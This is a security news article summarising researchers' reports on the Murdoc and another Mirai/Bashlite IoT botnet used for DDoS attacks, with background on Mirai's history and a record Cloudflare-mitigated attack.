Researchers have uncovered two Mirai-based botnets harnessing Internet of Things (IoT) devices to DDoS target organizations around the world.
The Murdoc botnet
Qualys researchers have laid bare the “Murdoc” botnet, consisting of some 1,300 IoT devices saddled with a variant of the Mirai malware that exploits vulnerabilities to compromise AVTECH Cameras and Huawei HG532 routers.
“In this latest campaign we note the utilization of ELF file and Shell Script execution, which leads to the deployment of the botnet sample,” the Qualys Threat Research Unit says.
“Each ShellScript is loaded onto devices such as IP cameras, Network devices, and IoT devices, and, in turn, the C2 server loads the new variant of Mirai botnet, i.e., Murdoc Botnet, into the devices.” (They pinpointed over 100+ distinct sets of C2 servers.)
The malware is executed on target devices and then removed. The infected devices are mostly located in Malaysia, but also in Thailand, Mexico, and Indonesia.
End-of-the-year attacks
Between December 27, 2024, and January 4, 2025, another IoT botnet comprised of devices infected with the Mirai and Bashlite (aka Gafgyt) malware has been used to mount large-scale DDoS attacks targeting companies in Japan, the US, Russia and Europe, Trend Micro researchers recently documented.
“The malware infiltrates the device by exploiting RCE vulnerabilities or weak passwords, then executes a download script on the infected host. This script downloads and executes a second-stage executable file (loader) from a distribution server,” they explained.
The loader then downloads the malware executable from the same server, and writes it in memory and executes it. “During this time, the executable payload is written to the memory image and executed, so that the executable file is not left on the infected host.”
Infected hosts can be made to engage in different types of DDoS attacks, and they are also available as a Socks proxy server for an underground proxy service.
Among the infected devices that they’ve been able to pinpoint, most were wireless routers manufactured by TP-Link and Zyxel.
Mirai: A constant threat
The October 2016 DDoS attacks on US-based DNS provider Dyn, which resulted in the temporary unavailability of many popular websites and online services, put the Mirai name on the map.
Earlier that same month, the malware’s source code had been leaked by its creator and, since then, Mirai-based variants proliferated, usually with labels that incorporate the Mirai name.
Cloudflare recently shared that a Mirai-variant botnet was responsible for a 5.6 Tbps UDP DDoS attack – the largest DDoS attack on record – against an internet service provider from Eastern Asia.
The attack originated from over 13,000 IoT devices, the company said. It lasted only 80 seconds and was seamlessly mitigated by Cloudflare’s distributed defense systems.